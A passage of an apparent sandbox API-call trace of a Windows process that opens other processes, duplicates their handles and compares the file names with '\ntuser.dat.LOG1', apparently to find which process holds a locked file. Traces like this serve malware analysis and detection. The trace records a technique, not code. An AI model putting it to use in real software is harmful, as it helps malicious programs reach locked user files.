hSourceProcessHandle=0x62c, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.899] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.899] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.900] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.900] CloseHandle (hObject=0x670) returned 1 [0151.900] _wcsicmp (_Str1="\\es.dll", _Str2="\\ntuser.dat.LOG1") returned -9 [0151.900] CloseHandle (hObject=0x680) returned 1 [0151.900] CloseHandle (hObject=0x62c) returned 1 [0151.900] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0151.900] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.900] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.901] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.901] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.901] CloseHandle (hObject=0x670) returned 1 [0151.901] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0151.902] CloseHandle (hObject=0x680) returned 1 [0151.902] CloseHandle (hObject=0x62c) returned 1 [0151.902] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.902] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.902] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.902] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.904] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.904] CloseHandle (hObject=0x670) returned 1 [0151.904] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.904] CloseHandle (hObject=0x680) returned 1 [0151.904] CloseHandle (hObject=0x62c) returned 1 [0151.904] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.904] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.904] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.905] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.905] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.905] CloseHandle (hObject=0x670) returned 1 [0151.905] CloseHandle (hObject=0x680) returned 1 [0151.905] CloseHandle (hObject=0x62c) returned 1 [0151.905] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.906] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.906] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.907] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.907] CloseHandle (hObject=0x670) returned 1 [0151.907] CloseHandle (hObject=0x680) returned 1 [0151.907] CloseHandle (hObject=0x62c) returned 1 [0151.907] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.907] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.907] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.908] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.909] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.909] CloseHandle (hObject=0x670) returned 1 [0151.909] _wcsicmp (_Str1="\\etc", _Str2="\\ntuser.dat.LOG1") returned -9 [0151.909] CloseHandle (hObject=0x680) returned 1 [0151.909] CloseHandle (hObject=0x62c) returned 1 [0151.909] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.909] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.910] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.910] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.910] CloseHandle (hObject=0x670) returned 1 [0151.910] CloseHandle (hObject=0x680) returned 1 [0151.911] CloseHandle (hObject=0x62c) returned 1 [0151.911] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.911] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.911] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.911] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.912] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.912] CloseHandle (hObject=0x670) returned 1 [0151.912] CloseHandle (hObject=0x680) returned 1 [0151.912] CloseHandle (hObject=0x62c) returned 1 [0151.912] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.912] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.913] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.913] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.914] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.914] CloseHandle (hObject=0x670) returned 1 [0151.914] CloseHandle (hObject=0x680) returned 1 [0151.914] CloseHandle (hObject=0x62c) returned 1 [0151.914] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.914] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.914] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.915] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.916] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.916] CloseHandle (hObject=0x670) returned 1 [0151.917] CloseHandle (hObject=0x680) returned 1 [0151.917] CloseHandle (hObject=0x62c) returned 1 [0151.917] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.917] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.917] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.918] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.918] CloseHandle (hObject=0x670) returned 1 [0151.918] CloseHandle (hObject=0x680) returned 1 [0151.918] CloseHandle (hObject=0x62c) returned 1 [0151.918] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.918] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.918] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.919] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.919] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.920] CloseHandle (hObject=0x670) returned 1 [0151.920] _wcsicmp (_Str1="\\wkssvc", _Str2="\\ntuser.dat.LOG1") returned 9 [0151.920] CloseHandle (hObject=0x680) returned 1 [0151.920] CloseHandle (hObject=0x62c) returned 1 [0151.920] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.920] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.920] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.921] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.921] CloseHandle (hObject=0x670) returned 1 [0151.921] _wcsicmp (_Str1="\\wkssvc", _Str2="\\ntuser.dat.LOG1") returned 9 [0151.921] CloseHandle (hObject=0x680) returned 1 [0151.921] CloseHandle (hObject=0x62c) returned 1 [0151.921] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.921] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.921] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.922] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.923] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.923] CloseHandle (hObject=0x670) returned 1 [0151.923] _wcsicmp (_Str1="\\wkssvc", _Str2="\\ntuser.dat.LOG1") returned 9 [0151.923] CloseHandle (hObject=0x680) returned 1 [0151.923] CloseHandle (hObject=0x62c) returned 1 [0151.923] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.923] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x268, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.923] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.924] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.925] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.925] CloseHandle (hObject=0x670) returned 1 [0151.925] _wcsicmp (_Str1="\\keysvc", _Str2="\\ntuser.dat.LOG1") returned -3 [0151.925] CloseHandle (hObject=0x680) returned 1 [0151.925] CloseHandle (hObject=0x62c) returned 1 [0151.925] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.925] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.925] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.926] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.927] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.927] CloseHandle (hObject=0x670) returned 1 [0151.927] _wcsicmp (_Str1="\\keysvc", _Str2="\\ntuser.dat.LOG1") returned -3 [0151.927] CloseHandle (hObject=0x680) returned 1 [0151.928] CloseHandle (hObject=0x62c) returned 1 [0151.928] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.928] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x274, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.928] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.928] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.929] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.929] CloseHandle (hObject=0x670) returned 1 [0151.929] _wcsicmp (_Str1="\\keysvc", _Str2="\\ntuser.dat.LOG1") returned -3 [0151.929] CloseHandle (hObject=0x680) returned 1 [0151.929] CloseHandle (hObject=0x62c) returned 1 [0151.929] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.929] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.929] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.930] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.930] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.930] CloseHandle (hObject=0x670) returned 1 [0151.930] CloseHandle (hObject=0x680) returned 1 [0151.930] CloseHandle (hObject=0x62c) returned 1 [0151.930] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.931] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x454, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.931] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.931] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.932] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.932] CloseHandle (hObject=0x670) returned 1 [0151.932] CloseHandle (hObject=0x680) returned 1 [0151.932] CloseHandle (hObject=0x62c) returned 1 [0151.932] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.932] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.933] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.933] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.933] CloseHandle (hObject=0x670) returned 1 [0151.933] CloseHandle (hObject=0x680) returned 1 [0151.933] CloseHandle (hObject=0x62c) returned 1 [0151.933] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.933] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.934] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.934] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.935] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.935] CloseHandle (hObject=0x670) returned 1 [0151.935] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0151.935] CloseHandle (hObject=0x680) returned 1 [0151.935] CloseHandle (hObject=0x62c) returned 1 [0151.935] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.935] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x570, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.935] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.936] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.937] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.937] CloseHandle (hObject=0x670) returned 1 [0151.937] _wcsicmp (_Str1="\\wkssvc", _Str2="\\ntuser.dat.LOG1") returned 9 [0151.937] CloseHandle (hObject=0x680) returned 1 [0151.937] CloseHandle (hObject=0x62c) returned 1 [0151.937] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.937] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.937] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.938] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.939] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.939] CloseHandle (hObject=0x670) returned 1 [0151.939] _wcsicmp (_Str1="\\edb.log", _Str2="\\ntuser.dat.LOG1") returned -9 [0151.939] CloseHandle (hObject=0x680) returned 1 [0151.939] CloseHandle (hObject=0x62c) returned 1 [0151.939] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.939] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.939] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.940] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.941] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.941] CloseHandle (hObject=0x670) returned 1 [0151.941] _wcsicmp (_Str1="\\catdb", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.941] CloseHandle (hObject=0x680) returned 1 [0151.941] CloseHandle (hObject=0x62c) returned 1 [0151.941] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0151.941] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.941] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.942] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.942] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.942] CloseHandle (hObject=0x670) returned 1 [0151.942] _wcsicmp (_Str1="\\catdb", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.942] CloseHandle (hObject=0x680) returned 1 [0151.943] CloseHandle (hObject=0x62c) returned 1 [0151.943] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x444) returned 0x62c [0151.943] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.943] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.946] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.946] CloseHandle (hObject=0x670) returned 1 [0151.946] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.946] CloseHandle (hObject=0x680) returned 1 [0151.946] CloseHandle (hObject=0x62c) returned 1 [0151.946] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.946] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.946] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.947] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.947] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.947] CloseHandle (hObject=0x670) returned 1 [0151.947] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.947] CloseHandle (hObject=0x680) returned 1 [0151.948] CloseHandle (hObject=0x62c) returned 1 [0151.948] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.948] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.948] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.948] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.949] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.949] CloseHandle (hObject=0x670) returned 1 [0151.949] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.949] CloseHandle (hObject=0x680) returned 1 [0151.949] CloseHandle (hObject=0x62c) returned 1 [0151.949] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.949] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x13c, 